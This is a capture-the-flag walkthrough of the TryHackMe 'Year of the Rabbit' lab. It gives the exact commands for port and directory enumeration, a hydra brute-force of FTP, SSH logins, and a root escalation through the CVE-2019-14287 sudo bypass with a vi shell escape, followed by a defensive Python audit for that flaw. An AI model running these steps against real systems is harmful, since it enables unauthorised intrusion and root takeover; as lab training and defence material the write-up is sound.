TryHackMe | Year of the Rabbit | Walkthrough

1. Initial Enumeration

The first step in any CTF is enumeration. Start by performing an nmap scan to discover open ports on the target machine.

nmap -p- -v <TARGET_IP> -Pn --min-rate 5000 -oN init

Follow this up with a more detailed scan on the identified ports (FTP, SSH, HTTP):

nmap -p21,22,80 -A <TARGET_IP> -v -oN target

Key results:

  • Port 21: FTP server (vsftpd 3.0.2) – anonymous login disabled.
  • Port 22: SSH server (OpenSSH 6.7p1)
  • Port 80: Web server (Apache 2.4.10)

2. Web Directory Bruteforce

To uncover hidden directories, we’ll use gobuster to brute-force directory names on the web server:

gobuster dir -u http://<TARGET_IP> -w /path/to/wordlist.txt

You’ll find a directory /WExYY2Cv-qU/ that contains an image file named Hot_Babe.png.

3. Inspect the Image

Let’s download the image and inspect it for any hidden information.

wget http://<TARGET_IP>/WExYY2Cv-qU/Hot_Babe.png

Next, use the strings command to check if there’s any embedded text within the image:

strings Hot_Babe.png

Result: Appended to the image data you’ll find an FTP username and a list of candidate passwords.

4. Brute-Force FTP Login

Using the discovered username and password list, brute-force the FTP login with hydra:

hydra -l ftpuser -P password_list.txt ftp://<TARGET_IP>

Once hydra finds a valid pair, you’ll have the username and password for the FTP service.

5. Download Sensitive File

Now, log in to the FTP server and download a file named Eli's_Creds.txt:

ftp <TARGET_IP>
get Eli's_Creds.txt

The file contains a program written in the Brainf*ck esoteric language. Running (decoding) it yields the SSH credentials for the user eli.

6. SSH into the Machine

With eli's SSH credentials, you can now log in to the machine:

ssh eli@<TARGET_IP>

7. Moving to Gwendoline's Account

Inside eli’s account, you’ll find clues leading to Gwendoline’s account. After searching through the directories, you’ll locate a file under /usr/games/s3cr3t/ that reveals Gwendoline’s password. The quickest way to find it is locate, which queries the file-name database rather than walking the filesystem, so the directory must already be indexed:

locate s3cr3t

8. SSH into Gwendoline’s Account

With the password found, log in to Gwendoline’s account:

ssh gwendoline@<TARGET_IP>

9. Privilege Escalation

To escalate privileges, check sudo permissions by running:

sudo -l

You’ll notice in the sudo -l output that vi can be run via sudo, but only under a restricted rule. This is exactly the condition for CVE-2019-14287: on sudo versions before 1.8.28, a rule that permits running a command as any user except root (a Runas spec of the form (ALL, !root)) can be bypassed by passing the user id -1, which sudo fails to reject and which leaves the effective user as root. Now, we’ll exploit that bug to bypass the restriction and execute vi as root:

sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt

Once in vi, escape to a root shell with:

:!/bin/bash
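
Added example (not part of the original walkthrough): a small Python audit that flags the combination CVE-2019-14287 needs, a sudo older than 1.8.28 together with a Runas spec that allows ALL but only excludes root, which is the pattern the vi rule above relies on. The version banner and the sample rules are constructed; the vi rule is an assumption about how this machine’s restriction is written. The fix on a real host is upgrading sudo to 1.8.28 or later, or not writing Runas specs of the form (ALL, !root).

```python
import re

# Version in which the uid -1 / 4294967295 check was fixed.
FIXED_VERSION = (1, 8, 28)
# Matches a Runas spec such as "(ALL, !root)" or "(ALL : ALL)".
RUNAS_RE = re.compile(r"\((?P<users>[^:)]*)(?::(?P<groups>[^)]*))?\)")

def parse_version(banner):
    """Extract (major, minor, patch) from 'sudo --version' output."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", banner)
    if not m:
        raise ValueError("unrecognised sudo version string: %r" % banner)
    return tuple(int(x) for x in m.groups())

def sudo_is_vulnerable(banner):
    """True for sudo releases older than 1.8.28."""
    return parse_version(banner) < FIXED_VERSION

def runas_spec_is_exploitable(rule):
    """True when the Runas user list allows ALL but excludes only root/#0:
    a vulnerable sudo accepts -u#-1, and setresuid() treats -1 as 'leave
    unchanged', so the command still runs with uid 0."""
    m = RUNAS_RE.search(rule)
    if not m:
        return False  # no Runas spec: root by design, not via the bug
    users = [u.strip() for u in m.group("users").split(",") if u.strip()]
    denied = {u[1:].strip() for u in users if u.startswith("!")}
    return "ALL" in users and bool(denied) and denied <= {"root", "#0"}

def audit(sudoers_lines, banner):
    """Return the rules that CVE-2019-14287 turns into a root escalation."""
    if not sudo_is_vulnerable(banner):
        return []
    rules = (ln.strip() for ln in sudoers_lines)
    return [r for r in rules
            if r and not r.startswith("#") and runas_spec_is_exploitable(r)]

# Constructed sample in the shape 'sudo -l' prints; the vi rule is an
# assumption about how the walkthrough's restriction is written.
SAMPLE_RULES = [
    "# User privilege specification",
    "(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt",
    "(ALL) NOPASSWD: /usr/bin/less",
    "(ALL, !root, !admin) /usr/bin/systemctl",
]

if __name__ == "__main__":
    for rule in audit(SAMPLE_RULES, "Sudo version 1.8.10p3"):
        print("exploitable via CVE-2019-14287:", rule)
```

Feed it the real lines from sudo -l and the banner from sudo --version to check a host; only the first sample rule is reported, because the third one also denies a non-root user and the second never excluded root at all.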

10. Capture the Flags

Now that you have root access, capture both the user and root flags.

User Flag: Located in /home/gwendoline/user.txt

cat /home/gwendoline/user.txt

Root Flag: Located in /root/root.txt

cat /root/root.txt

Summary of Attacks:

  • Directory Brute-Forcing: We uncovered a hidden directory and gathered credentials from the image it contained.
  • Privilege Escalation: Using CVE-2019-14287, we escalated to root and captured the flags.

Congratulations on completing the Year of the Rabbit challenge! If you enjoyed this walkthrough, stay tuned for more CTF challenge solutions!
